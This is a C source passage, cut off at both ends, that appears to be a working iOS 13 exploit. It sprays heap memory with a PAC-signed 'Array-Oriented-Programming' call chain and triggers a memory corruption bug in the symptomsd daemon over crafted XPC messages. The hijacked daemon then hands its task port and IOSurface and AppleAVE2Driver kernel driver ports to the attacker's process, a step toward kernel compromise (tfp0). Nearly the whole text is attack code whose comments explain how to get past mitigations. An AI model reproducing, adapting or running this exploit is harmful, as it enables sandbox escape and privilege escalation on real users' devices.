\\\n*(uint64_t*)(func_call_payload) = 0; \\\n*(uint32_t*)(func_call_payload + 8) = 0; \\\nchar *tmp_ha = func_call_payload + 24; /* Saved an offset later gonna involves multiple time */ \\\n*(uint32_t*)(tmp_ha + 4) = 150; \\\n*(uint32_t*)(func_call_payload + 4) = 116; \\\n*(uint64_t*)(tmp_ha + 16) = PACSupport_paciza(PACSupport_xpaci(FUNC)); /* func ptr */ \\\n*(uint64_t*)(tmp_ha + 24) = ARG1; /* arg1 */ \\\n*(uint32_t*)(tmp_ha + 72) = ARG2; /* arg2 (Only 32bits)*/ \\\n*(uint64_t*)(tmp_ha + 76) = ARG3; /* arg3 */ \\\n*(uint64_t*)(tmp_ha + 84) = ARG4;} // arg4\n\n#define aop_FuncCALL_memcpy_32bits(dst, src) \\\naop_FuncCALL((void*)Gadget_memcopy, src, 0, 0, dst)\n\n#define aop_Insert_String(VAR, STR) \\\nsize_t _##VAR##_len = strlen(STR) + 1; \\\nuint64_t VAR = SPRAY_ADDRESS + _aop_data_offset; \\\nmemcpy((char*)spraymem + _aop_data_offset, STR, _##VAR##_len); \\\n_##VAR##_len = (~0xF) & (_##VAR##_len + 0xF); \\\n_aop_data_offset += _##VAR##_len;\n\n#define aop_Insert_Data(VAR, DATA, SIZE) \\\nsize_t _##VAR##_SIZE = SIZE; \\\nuint64_t VAR = SPRAY_ADDRESS + _aop_data_offset; \\\nmemcpy((char*)spraymem + _aop_data_offset, DATA, _##VAR##_SIZE); \\\n_##VAR##_SIZE = (~0xF) & (_##VAR##_SIZE + 0xF); \\\n_aop_data_offset += _##VAR##_SIZE;\n\nvoid Find_aopGadgets(){\n    \n#define _SEEK(V) if(!(V = _##V)){printf(\"No \"#V\" Found!\\n\");exit();}\n    \n    //_SEEK(Gadget_dualJump); Unused\n    //_SEEK(Gadget_strip_x0); Unused\n    //_SEEK(Gadget_control_x0x2); Switch to speed version\n    //_SEEK(Gadget_memcopy); Switch to speed version\n\n}\n\n/*void Find_aopGadgets_speed(){\n    \n    const char *target_lib_1 = \"/System/Library/PrivateFrameworks/CoreUtils.framework/CoreUtils\";\n    const char *target_lib_2 = \"/System/Library/PrivateFrameworks/WebCore.framework/Frameworks/libwebrtc.dylib\";\n    \n    dlopen(target_lib_1, RTLD_NOW);\n    dlopen(target_lib_2, RTLD_NOW);\n    \n    for (uint32_t i = 0; i < _dyld_image_count(); i++){\n        \n        const char *name = 
_dyld_get_image_name(i);\n        if(!strcmp(name, target_lib_1)){\n            \n            void *findingRange_start = (void*)_dyld_get_image_header(i);\n            uint64_t findingRange_size = (uint64_t)Get_loaded_dylib_size(findingRange_start);\n            _SEEK(Gadget_control_x0x2);\n        }\n        else if(!strcmp(name, target_lib_2)){\n            \n            void *findingRange_start = (void*)_dyld_get_image_header(i);\n            uint64_t findingRange_size = (uint64_t)Get_loaded_dylib_size(findingRange_start);\n            _SEEK(Gadget_memcopy);\n        }\n    }\n}\n*/\n\n void Find_aopGadgets_speed(){\n    \n    const char *target_lib_1 = \"/System/Library/PrivateFrameworks/CoreUtils.framework/CoreUtils\";\n    const char *target_lib_2 = \"/System/Library/PrivateFrameworks/WebCore.framework/Frameworks/libwebrtc.dylib\";\n    \n    dlopen(target_lib_1, RTLD_NOW);\n    dlopen(target_lib_2, RTLD_NOW);\n    \n    for (uint32_t i = 0; i < _dyld_image_count(); i++){\n        \n        {\n            void *findingRange_start = (void*)_dyld_get_image_header(i);\n            uint64_t findingRange_size = (uint64_t)Get_loaded_dylib_size(findingRange_start);\n            if(!Gadget_control_x0x2)\n                Gadget_control_x0x2 = _Gadget_control_x0x2;\n        }\n        {\n            void *findingRange_start = (void*)_dyld_get_image_header(i);\n            uint64_t findingRange_size = (uint64_t)Get_loaded_dylib_size(findingRange_start);\n            if(!Gadget_memcopy)\n                Gadget_memcopy = _Gadget_memcopy;\n        }\n    }\n    if(!Gadget_control_x0x2){\n        printf(\"Error: Gadget_control_x0x2 not found!\\n\"); sleep(999);\n    }\n    if(!Gadget_memcopy){\n        printf(\"Error: Gadget_memcopy not found!\\n\"); sleep(999);\n    }\n}\n\n// Look up service: com.apple.usymptomsd\nuint8_t bootstrap_look_up_machmsg_bytes[244] = 
{0x13,0x15,0x13,0x0,0xf4,0x0,0x0,0x0,0x7,0x7,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x10,0x43,0x50,0x58,0x40,0x5,0x0,0x0,0x0,0x0,0xf0,0x0,0x0,0xcc,0x0,0x0,0x0,0x8,0x0,0x0,0x0,0x73,0x75,0x62,0x73,0x79,0x73,0x74,0x65,0x6d,0x0,0x0,0x0,0x0,0x40,0x0,0x0,0x5,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x68,0x61,0x6e,0x64,0x6c,0x65,0x0,0x0,0x0,0x40,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x69,0x6e,0x73,0x74,0x61,0x6e,0x63,0x65,0x0,0x0,0x0,0x0,0x0,0xa0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x72,0x6f,0x75,0x74,0x69,0x6e,0x65,0x0,0x0,0x40,0x0,0x0,0xcf,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x66,0x6c,0x61,0x67,0x73,0x0,0x0,0x0,0x0,0x40,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x6e,0x61,0x6d,0x65,0x0,0x0,0x0,0x0,0x0,0x90,0x0,0x0,0x15,0x0,0x0,0x0,0x63,0x6f,0x6d,0x2e,0x61,0x70,0x70,0x6c,0x65,0x2e,0x75,0x73,0x79,0x6d,0x70,0x74,0x6f,0x6d,0x73,0x64,0x0,0x0,0x0,0x0,0x74,0x79,0x70,0x65,0x0,0x0,0x0,0x0,0x0,0x40,0x0,0x0,0x7,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x74,0x61,0x72,0x67,0x65,0x74,0x70,0x69,0x64,0x0,0x0,0x0,0x0,0x30,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0};\n\nuint8_t vm_remap_machmsg_bytes[92] = {0x13,0x15,0x0,0x80,0x5c,0x0,0x0,0x0,0x11,0x11,0x11,0x11,0x22,0x22,0x22,0x22,0x0,0x0,0x0,0x0,0xcd,0x12,0x0,0x0,0x1,0x0,0x0,0x0,0x3,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x13,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x33,0x33,0x0,0x0,0x0,0x0,0x0,0x0,0xff,0xf,0x0,0x0,0x0,0x0,0x0,0x0,0x1,0x40,0x0,0x0,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0};\n\nvoid Assemble_AOP(uint64_t *aop_stack, uint64_t rop_start_address){\n    \n    extern void get_string(char *copyto); // copy a fake string\n    get_string(aop_stack);\n}\n\nvoid Assemble_AOP2(uint64_t *spraymem, uint64_t spray_start_address){\n    \n    // Trigger vuln causing call objc_release with fake_xpcobj\n    char *fake_xpcobj = (char*)spraymem;\n    *(uint64_t*)fake_xpcobj = (uint64_t)dlsym((void*)-2, \"_xpc_type_file_transfer\");\n    *(uint32_t*)(fake_xpcobj + 0xC) = 0; 
// set retainCnt as 0, leads to _xpc_file_transfer_dispose\n    *(uint64_t*)(fake_xpcobj + 0x40) = spray_start_address + 0x48; // leads to _Block_release during disposal\n    \n    char *fake_Block = ((char*)spraymem) + 0x48;\n    char *fake_Block_core = fake_Block + 0x40;\n    \n    *(uint32_t*)(fake_Block + 0x8) = 0x3000000 | 0x2; // Necessary bits mask | retainCnt\n    *(uint64_t*)(fake_Block + 0x18) = (uint64_t)spray_start_address + 0x48 + 0x40;\n    \n    // First place got control of PC\n    *(uint64_t*)(fake_Block_core + 0x18) = PACSupport_pacia(Gadget_control_x0x2, (uint64_t)spray_start_address + 0x48 + 0x40 + 0x18);\n    \n    // --- Execute control_x0x2 gadget\n    *(uint64_t*)(fake_Block + 0x20) = PACSupport_paciza(PACSupport_xpaci(dlsym((void*)-2, \"xpc_array_apply_f\"))); // Next jmp\n    *(uint64_t*)(fake_Block + 0x28) = spray_start_address + 0x100 - 24; // Reset x0, point to our spray mem, explicitly, a crafted xpc array\n    *(uint64_t*)(fake_Block + 0x30) = (uint64_t)IODispatchCalloutFromMessage; // Reset x2\n    *(uint64_t*)(fake_Block + 0x38) = 0x0; // Reset w1 (Only 32bit)\n    \n    /*\n     Begin Array-Oriented-Programming function chain-calling\n     \n     Payload arrangement:\n     \n     0x0\n     ... Used during taking control of PC\n     0x100\n     ... AOP array object itself\n     0x118\n     ... For AOP data-use\n     0x1500\n     ... For AOP call-use\n     0x3E00\n     ... 
AOP array storage\n     0x4000\n     */\n    \n    uint32_t _aop_FuncCALL_primer_offset = 0x3E00;\n    uint32_t _aop_FuncCALL_offset = 0x1800;\n    uint32_t _aop_data_offset = 0x118; // offset is right after fake array\n    \n    // Craft a fake array, stru has changed and req size increased to 0x18 since iOS13, was 0x10\n    spraymem[OF(0x100)] = spray_start_address + _aop_FuncCALL_primer_offset; // Array internal pointer, point to stored objects pool\n    spraymem[OF(0x108)] = -1; // Array count, -1 causes the array to iterate endlessly  -1\n    spraymem[OF(0x110)] = 0; // new value introd since iOS13, keep it empty\n    \n    // --- Following are AOP data-use\n    \n    aop_Insert_Data(lookup_io_server_rawmsg, bootstrap_look_up_machmsg_bytes, sizeof(bootstrap_look_up_machmsg_bytes));\n    *(uint64_t*)(vm_remap_machmsg_bytes + 56) = 0x4000000; // 0x4000000 //0x30000; // size of iosurface\n    aop_Insert_Data(vm_remap_rawmsg, vm_remap_machmsg_bytes, sizeof(vm_remap_machmsg_bytes));\n    \n    struct {\n        mach_msg_header_t Head;\n        // Head.msgh_local_port: +12\n        mach_msg_body_t msgh_body;\n        mach_msg_port_descriptor_t our_recv_port;\n        // our_recv_port.name: +28\n        mach_msg_port_descriptor_t our_task_port;\n        // our_task_port.name: +40\n        mach_msg_port_descriptor_t IOSurfaceRoot_servport;\n        // IOSurfaceRoot_servport.name: +52\n        mach_msg_port_descriptor_t AppleAVE2Driver_servport;\n        // AppleAVE2Driver_servport.name: +64\n        mach_msg_trailer_t trailer;\n    }_remote_recvmsg = {0}; // Size: 84\n    _remote_recvmsg.Head.msgh_size = sizeof(_remote_recvmsg);\n    \n    struct {\n        mach_msg_header_t Head;\n        // Head.msgh_local_port: +12\n        mach_msg_trailer_t trailer;\n    }_remote_recvmsg2 = {0}; // Size: 32\n    _remote_recvmsg2.Head.msgh_size = sizeof(_remote_recvmsg2);\n    \n    struct {\n        mach_msg_header_t Head;\n        // Head.msgh_local_port: +12\n        uint64_t 
remote_map_addr;\n        // remote_map_addr: +24\n        mach_msg_trailer_t trailer;\n    }_remote_recvmsg3 = {0}; // Size: 56\n    _remote_recvmsg3.Head.msgh_size = sizeof(_remote_recvmsg3);\n    \n    struct {\n        mach_msg_header_t Head;\n        // Head.msgh_remote_port +8\n        mach_msg_body_t msgh_body;\n        mach_msg_port_descriptor_t port_send_to_us;\n        // port_send_to_us.name +28\n    }_remote_sendmsg = {0};\n    _remote_sendmsg.Head.msgh_bits = MACH_MSGH_BITS_COMPLEX|MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE);\n    _remote_sendmsg.Head.msgh_size = sizeof(_remote_sendmsg);\n    _remote_sendmsg.msgh_body.msgh_descriptor_count = 1;\n    _remote_sendmsg.port_send_to_us.name = mach_task_self();\n    _remote_sendmsg.port_send_to_us.disposition = MACH_MSG_TYPE_MOVE_SEND;\n    _remote_sendmsg.port_send_to_us.type = MACH_MSG_PORT_DESCRIPTOR;\n    \n    struct {\n        mach_msg_header_t Head;\n    }_remote_sendmsg2 = {0};\n    _remote_sendmsg2.Head.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE);\n    _remote_sendmsg2.Head.msgh_size = sizeof(_remote_sendmsg2);\n    \n    struct {\n        mach_msg_header_t Head;\n        uint64_t send_remap_addr_to_us;\n        // send_remap_addr_to_us: +24\n    }_remote_sendmsg3 = {0};\n    _remote_sendmsg3.Head.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE);\n    _remote_sendmsg3.Head.msgh_size = sizeof(_remote_sendmsg3);\n    \n    aop_Insert_Data(remote_recvmsg, &_remote_recvmsg, sizeof(_remote_recvmsg));\n    aop_Insert_Data(remote_recvmsg2, &_remote_recvmsg2, sizeof(_remote_recvmsg2));\n    aop_Insert_Data(remote_recvmsg3, &_remote_recvmsg3, sizeof(_remote_recvmsg3));\n    aop_Insert_Data(remote_sendmsg, &_remote_sendmsg, sizeof(_remote_sendmsg));\n    aop_Insert_Data(remote_sendmsg2, &_remote_sendmsg2, sizeof(_remote_sendmsg2));\n    aop_Insert_Data(remote_sendmsg3, &_remote_sendmsg3, 
sizeof(_remote_sendmsg3));\n    \n    // --- Following are AOP code-use\n    \n    // Call bootstrap_look_up to retri listening port\n    aop_FuncCALL(mach_port_allocate, mach_task_self(), MACH_PORT_RIGHT_RECEIVE, lookup_io_server_rawmsg + offsetof(mach_msg_header_t, msgh_local_port), 0);\n    aop_FuncCALL(mach_msg_send, lookup_io_server_rawmsg, 0, 0, 0);\n    aop_FuncCALL(mach_msg_receive, lookup_io_server_rawmsg, 0, 0, 0);\n    \n    aop_FuncCALL_memcpy_32bits(remote_recvmsg + offsetof(mach_msg_header_t, msgh_local_port), lookup_io_server_rawmsg + 28);\n    aop_FuncCALL(mach_msg_receive, remote_recvmsg, 0, 0, 0);\n    aop_FuncCALL_memcpy_32bits(remote_recvmsg2+12, remote_recvmsg+12);\n    aop_FuncCALL_memcpy_32bits(remote_recvmsg3+12, remote_recvmsg+12);\n    aop_FuncCALL_memcpy_32bits(remote_sendmsg+8, remote_recvmsg+28);\n    aop_FuncCALL_memcpy_32bits(remote_sendmsg2+8, remote_recvmsg+28);\n    aop_FuncCALL_memcpy_32bits(remote_sendmsg3+8, remote_recvmsg+28);\n    \n    aop_FuncCALL_memcpy_32bits(vm_remap_rawmsg+8, remote_recvmsg+40);\n    aop_FuncCALL(mach_port_allocate, mach_task_self(), MACH_PORT_RIGHT_RECEIVE, vm_remap_rawmsg + offsetof(mach_msg_header_t, msgh_local_port), 0);\n    \n    aop_FuncCALL(mach_msg_send, remote_sendmsg2, 0, 0, 0); // To inform us that pwned proc got the msg contains our port\n    \n    // Then passing own task port to us\n    aop_FuncCALL(mach_msg_send, remote_sendmsg, 0, 0, 0);\n    /*\n     Reason of doing this, instead like in iOS12 exploit, open IO service port via IOServiceOpen and passing to us directly.\n     iOS 13 added new mitigation prevent all IOUserClient (obtain via IOServiceOpen) port from moving to other ipc space, namely diff tasks.\n     \n     I supposed these port are marked as guarded port.\n     \n     Example crash:\n     Exception Type:  EXC_GUARD\n     Exception Subtype: GUARD_TYPE_MACH_PORT\n     Exception Message:  on mach port 84999 (guarded with 0x0000000000000000)\n     Exception Note:  SIMULATED 
(this is NOT a crash)\n     \n     Way to get around this is \"passively\" passing to us, like use task_get_special_port/task_set_special_port trick\n     */\n    \n    // Opening and passing kernel driver ports to us.\n    aop_FuncCALL_memcpy_32bits(spray_start_address + _aop_FuncCALL_offset + 24 + 24, remote_recvmsg+52);\n    aop_FuncCALL(dlsym((void*)-2, \"IOServiceOpen\"), 0x414141, mach_task_self(), 0, spray_start_address + _aop_FuncCALL_offset + 24 + 76);\n    \n    aop_FuncCALL(task_set_special_port, mach_task_self(), TASK_SEATBELT_PORT, 0x414141, 0);\n    aop_FuncCALL(mach_msg_send, remote_sendmsg2, 0, 0, 0);\n    aop_FuncCALL(mach_msg_receive, remote_recvmsg2, 0, 0, 0); // Waiting for us to notify pwned proc we got the port\n    \n    aop_FuncCALL_memcpy_32bits(SPRAY_ADDRESS + _aop_FuncCALL_offset + 24 + 24, remote_recvmsg+64);\n    aop_FuncCALL(dlsym((void*)-2, \"IOServiceOpen\"), 0x414141, mach_task_self(), 0, spray_start_address + _aop_FuncCALL_offset + 24 + 76);\n    \n    aop_FuncCALL(task_set_special_port, mach_task_self(), TASK_ACCESS_PORT, 0x414141, 0);\n    aop_FuncCALL(mach_msg_send, remote_sendmsg2, 0, 0, 0);\n    \n    // Waiting for overwriting over the iosurface mapping memory, key to trigger vulnerability in kernel\n    aop_FuncCALL(mach_msg_receive, remote_recvmsg3, 0, 0, 0);\n    \n    // Perform cross-task memory mapping\n    aop_FuncCALL_memcpy_32bits(vm_remap_rawmsg+76, remote_recvmsg3+24);\n    aop_FuncCALL_memcpy_32bits(vm_remap_rawmsg+80, remote_recvmsg3+28); // src addr which is the remote mapping addr\n    aop_FuncCALL(mach_msg_send, vm_remap_rawmsg, 0, 0, 0);\n    aop_FuncCALL(mach_msg_receive, vm_remap_rawmsg, 0, 0, 0);\n    \n    // send remap addr to us\n    aop_FuncCALL_memcpy_32bits(remote_sendmsg3+24, vm_remap_rawmsg+36);\n    aop_FuncCALL_memcpy_32bits(remote_sendmsg3+28, vm_remap_rawmsg+40); // src addr which is the remote mapping addr\n    aop_FuncCALL(mach_msg_send, remote_sendmsg3, 0, 0, 0);\n    \n    // Block here to 
waiting for finish exploitation\n    aop_FuncCALL(mach_msg_receive, remote_recvmsg2, 0, 0, 0);\n    \n    // Duty completed\n    aop_FuncCALL(exit, 0, 0, 0, 0);\n    \n    //printf(\"_aop_data_offset: 0x%x\\n\", _aop_data_offset);\n    //printf(\"_aop_FuncCALL_offset: 0x%x\\n\", _aop_FuncCALL_offset);\n    //printf(\"_aop_FuncCALL_primer_offset: 0x%x\\n\", _aop_FuncCALL_primer_offset);\n}\n\nvoid symptomsd_vuln_prepare1(){\n    \n    xpc_connection_t xpcconn = xpc_connection_create_mach_service(\"com.apple.symptoms.symptomsd.managed_events\", NULL, 0);\n    xpc_connection_set_event_handler(xpcconn, ^(xpc_object_t object) {\n    });\n    xpc_connection_resume(xpcconn);\n    \n    xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);\n    xpc_dictionary_set_uint64(msg, \"type\", 2); // case 2: read_and_set_config, case 3: read_config\n    \n    xpc_object_t config_arr = xpc_array_create(NULL, 0);\n    xpc_dictionary_set_value(msg, \"config\", config_arr);\n    \n    xpc_object_t each_config = xpc_dictionary_create(NULL, NULL, 0);\n    // Parse by -[ConfigurationHandler read:returnedValues:]\n    xpc_array_append_value(config_arr, each_config);\n    \n    xpc_dictionary_set_string(each_config, \"GENERIC_CONFIG_TARGET\", \"com.apple.symptoms.test.request-passthrough\"); // [knownItems objectForKey: ???]\n    \n    xpc_object_t signature_arr = xpc_array_create(NULL, 0);\n    xpc_dictionary_set_value(each_config, \"TRIGGERED_SIGNATURES\", signature_arr); // Enter -[SimpleSymptomEvaluator configureInstance:]\n    \n    xpc_object_t each_signature = xpc_dictionary_create(NULL, NULL, 0);\n    xpc_array_append_value(signature_arr, each_signature);\n    \n    xpc_dictionary_set_string(each_signature, \"SIGNATURE_NAME\", \"HAHA\");\n    \n    xpc_dictionary_set_string(each_signature, \"ADDITIONAL_INFO_GENERATOR\", \"CertificateErrors\"); //CertificateErrors\n    xpc_dictionary_set_string(each_signature, \"ADDITIONAL_INFO_SELECTOR\", \"conditionMinCount\"); 
//additionalSelector\n    \n    xpc_dictionary_set_string(each_signature, \"SYNDROME_NAME\", \"new_HAHA2\");  // must set\n    xpc_dictionary_set_int64(each_signature, \"RULE_AWD_CODE\", 7);\n    \n    // -[SimpleSyndromeHandler configureInstance:]\n    xpc_dictionary_set_int64(each_signature, \"SYNDROME_DAMPENING_INTERVAL\", 0); // SimpleSyndromeHandler->_dampeningInterval\n    xpc_dictionary_set_string(each_signature, \"SYNDROME_HANDLER\", \"ManagedEventHandler\"); // ??? getHandlerByName:\n    \n    \n    xpc_connection_send_message_with_reply(xpcconn, msg, dispatch_get_main_queue(), ^(xpc_object_t object) {\n    });\n}\n\nvoid symptomsd_vuln_prepare2(int boo){\n    \n    xpc_connection_t xpcconn = xpc_connection_create_mach_service(\"com.apple.symptoms.symptomsd.managed_events\", NULL, 0);\n    xpc_connection_set_event_handler(xpcconn, ^(xpc_object_t object) {\n    });\n    xpc_connection_resume(xpcconn);\n    \n    xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);\n    xpc_dictionary_set_uint64(msg, \"type\", 2); // case 2/3\n    \n    xpc_object_t config_arr = xpc_array_create(NULL, 0);\n    xpc_dictionary_set_value(msg, \"config\", config_arr);\n    \n    xpc_object_t each_config = xpc_dictionary_create(NULL, NULL, 0); // Parse by -[ConfigurationHandler read:returnedValues:]\n    xpc_array_append_value(config_arr, each_config);\n    \n    xpc_dictionary_set_string(each_config, \"GENERIC_CONFIG_TARGET\", \"CertificateErrors\"); // [knownItems objectForKey: CertificateErrors]\n    \n    if(boo){\n        xpc_dictionary_set_string(each_config, \"REQUIRED_MINIMUM_COUNT\", \"5637210112\"); // Turn SPRAY_ADDRESS to Decimal\n    }\n    else{\n        xpc_dictionary_set_string(each_config, \"REQUIRED_MINIMUM_COUNT\", \"0\"); // 0x150010110 (5637210384) | crash: 22817079568\n    }\n\n    xpc_connection_send_message_with_reply(xpcconn, msg, dispatch_get_main_queue(), ^(xpc_object_t object) {\n    });\n}\n\nvoid symptomsd_vuln_trigger(int boo){\n    \n    
xpc_connection_t xpcconn = xpc_connection_create_mach_service(\"com.apple.usymptomsd\", NULL, 0);\n    xpc_connection_set_event_handler(xpcconn, ^(xpc_object_t object) {\n        //printf(\"replyA\\n\");\n        //char *err = xpc_dictionary_get_string(object, XPC_ERROR_KEY_DESCRIPTION);\n        //printf(\"erra: %s\\n\", err);\n    });\n    xpc_connection_resume(xpcconn);\n    \n    size_t payload_size = 8 + 72 + 100 + 6; // payload head + 1st tlv length + 1st tlv body + beginning of 2nd tlv (To break the loop)\n    char *payload = malloc(payload_size);\n    bzero(payload, payload_size);\n    \n    *(uint16_t*)payload = 2; // case ? for switch statement\n    *(uint16_t*)(payload + 2) = 72; // len for SYMTLV_SYM_BASIC\n    *(uint8_t*)(payload + 11) = 0x40; // Do not let it passes: if ( !(*(_BYTE *)(payload + 11) & 0x40) )\n    *(uint16_t*)(payload + 72 + 4) = 8; // Do not let it passes: if ( *(_WORD *)(payload_ing_inner + *(uint16_t*)(payload + 2) + 4) != 8 )\n    \n    char *payload_inner = payload + 72 + 4;\n    \n    *(uint16_t*)(payload_inner + 2) = 100; // v45\n    // Do not let these pass: if ( v45 & 3 )\n    //                        if ( payload_remain_len < v45 + 4 )    //payload_remain_len: payload_size - 72 - 4\n    //                        if ( (unsigned int)v45 <= 11 )\n    //                        if ( v47 + 8 > v45 )                   //v47: *(uint32_t*)(payload_inner + 8)\n    *(uint32_t*)(payload_inner + 8) = 100 - 8; // provided EventKey max length\n    *(uint32_t*)(payload_inner + 4) = 0xFFFFFFFF; // Must let it passes: if( _bittest((int*)(payload_inner + 4), 29u) )\n    strcpy(payload_inner + 12, \"com.apple.symptoms.test.request-passthrough\");\n    \n    xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);\n    xpc_dictionary_set_data(msg, \"payload\", payload, payload_size);\n    \n    void *sprayData = NULL;\n    \n    if(boo){\n        \n        // Prepare spray data\n        uint32_t sprayData_len = 0x20000;\n        sprayData = 
malloc(sprayData_len);\n        memset(sprayData, 0x0, sprayData_len);\n        \n        for(int i=0; i<sprayData_len; i=i+0x4000){\n            char *each_page_spray = sprayData + i;\n            \n            /*\n             Nowadays iOS device basically all have 0x4000 PAGE_SIZE, good for spray technique\n             */\n            \n            if(boo == 1)\n                Assemble_AOP((uint64_t*)each_page_spray, SPRAY_ADDRESS);\n            if(boo == 2)\n                Assemble_AOP2((uint64_t*)each_page_spray, SPRAY_ADDRESS);\n        }\n        \n        \n        \n        xpc_object_t sprayarr = xpc_array_create(NULL, 0);\n        xpc_object_t spraydata = xpc_data_create(sprayData, sprayData_len);\n        \n        for(int i=0; i<13000; i++){\n            xpc_array_append_value(sprayarr, spraydata);\n        }\n        xpc_dictionary_set_value(msg, \"spray\", sprayarr); // Send the spray data along with the trigger msg\n        \n    }\n    \n    xpc_connection_send_message_with_reply(xpcconn, msg, dispatch_get_main_queue(), ^(xpc_object_t object) {\n        //printf(\"replyB: %s\\n\", xpc_copy_description(object));\n    });\n    \n    if(boo)\n        free(sprayData);\n}\n\n#pragma mark - Pre-exploitation - Our Mach Server\n\nmach_port_t our_serverport = 0;\nvoid Prepare_our_Mach_server(){\n    kern_return_t kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &our_serverport);\n    if(our_serverport == 0){\n        printf(\"Error occurred when mach_port_allocate: 0x%x!\\n\", kr);\n        exit();\n    }\n}\n\nmach_port_t symptomsd_bsport = 0;\nuint32_t Retrieve_symptomsd_bootstrap_port(){\n    if(symptomsd_bsport)\n        return symptomsd_bsport;\n    bootstrap_look_up(bootstrap_port, TARGET_MACH_SERVICE, &symptomsd_bsport);\n    if(!symptomsd_bsport){\n        printf(\"%s bootstrap_look_up failed\\n\", TARGET_MACH_SERVICE);\n        return 0;\n    }\n    return symptomsd_bsport;\n}\n\n// For post-exploit achieve tfp0 
backdoor\nuint32_t Retrieve_midi_bootstrap_port(){\n    uint32_t midi_port;\n    bootstrap_look_up(bootstrap_port, \"com.apple.midiserver\", &midi_port);\n    if(!midi_port){\n        printf(\"%s bootstrap_look_up failed\\n\", \"com.apple.midiserver\");\n        return 0;\n    }\n    return midi_port;\n}\n\nbool Send_our_serverport(){\n    struct {\n        mach_msg_header_t Head;\n        mach_msg_body_t msgh_body;\n        mach_msg_port_descriptor_t our_recv_port;\n        mach_msg_port_descriptor_t our_task_port;\n        mach_msg_port_descriptor_t IOSurfaceRoot_servport;\n        mach_msg_port_descriptor_t AppleAVE2Driver_servport;\n    }msg = {0};\n    \n    msg.Head.msgh_bits = MACH_MSGH_BITS_COMPLEX|MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE);\n    msg.Head.msgh_size = sizeof(msg);\n    msg.Head.msgh_remote_port = Retrieve_symptomsd_bootstrap_port();\n    msg.Head.msgh_id = 0x8888;\n    msg.msgh_body.msgh_descriptor_count = 4;\n    msg.our_recv_port.name = our_serverport;\n    msg.our_recv_port.disposition = MACH_MSG_TYPE_MAKE_SEND;\n    msg.our_recv_port.type = MACH_MSG_PORT_DESCRIPTOR;\n    msg.our_task_port.name = mach_task_self();\n    msg.our_task_port.disposition = MACH_MSG_TYPE_COPY_SEND;\n    msg.our_task_port.type = MACH_MSG_PORT_DESCRIPTOR;\n    \n    extern CFMutableDictionaryRef IOServiceMatching(const char *name);\n    extern io_service_t IOServiceGetMatchingService(mach_port_t masterPort, CFDictionaryRef matching);\n    \n    msg.IOSurfaceRoot_servport.name = IOServiceGetMatchingService(0, IOServiceMatching(\"IOSurfaceRoot\"));\n    msg.IOSurfaceRoot_servport.disposition = MACH_MSG_TYPE_COPY_SEND;\n    msg.IOSurfaceRoot_servport.type = MACH_MSG_PORT_DESCRIPTOR;\n    \n    msg.AppleAVE2Driver_servport.name = IOServiceGetMatchingService(0, IOServiceMatching(\"AppleAVE2Driver\"));\n    msg.AppleAVE2Driver_servport.disposition = MACH_MSG_TYPE_COPY_SEND;\n    msg.AppleAVE2Driver_servport.type = MACH_MSG_PORT_DESCRIPTOR;\n   
 \n    mach_msg(&msg.Head, MACH_SEND_MSG, msg.Head.msgh_size, 0, 0, 0, 0);\n    {\n        // Check if our msg has been received yet\n        bzero(&msg.Head, sizeof(msg));\n        msg.Head.msgh_size = sizeof(msg);\n        msg.Head.msgh_local_port = our_serverport;\n        \n        if(mach_msg(&msg.Head, MACH_RCV_MSG|MACH_RCV_TIMEOUT, 0, msg.Head.msgh_size, msg.Head.msgh_local_port, 500, 0))\n            return false;\n    }\n    \n    return true;\n}\n\nmach_port_t Retrieve_symptomsd_task_port(){\n    struct {\n        mach_msg_header_t Head;\n        mach_msg_body_t msgh_body;\n        mach_msg_port_descriptor_t port;\n        mach_msg_trailer_t trailer;\n    }msg = {0};\n    msg.Head.msgh_size = sizeof(msg);\n    msg.Head.msgh_local_port = our_serverport;\n    int mrr = mach_msg_receive(&msg.Head);\n    \n    if(mrr != 0){\n        printf(\"Error occurred when Reply_ioservice_handler(0x%x)\\n\", mrr);\n        return 0;\n    }\n    return msg.port.name;\n}\n\nvoid Send_overwritting_iosurfaceMap(uint64_t remote_map_addr, uint64_t *local_map_addr){\n    \n    struct {\n        mach_msg_header_t Head;\n        uint64_t remote_map_addr;\n    }msg = {0};\n    \n    msg.Head.msgh_bits = MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);\n    msg.Head.msgh_size = sizeof(msg);\n    msg.Head.msgh_remote_port = Retrieve_symptomsd_bootstrap_port();\n    msg.remote_map_addr = remote_map_addr;\n    \n    mach_msg(&msg.Head, MACH_SEND_MSG, msg.Head.msgh_size, 0, 0, 0, 0);\n    \n    struct {\n        mach_msg_header_t Head;\n        uint64_t local_map_addr;\n        mach_msg_trailer_t trailer;\n    }msg2 = {0};\n    msg2.Head.msgh_size = sizeof(msg2);\n    msg2.Head.msgh_local_port = our_serverport;\n    int rt = mach_msg_receive(&msg2.Head);\n    \n    printf(\"vm remap: 0x%x local_map_addr: 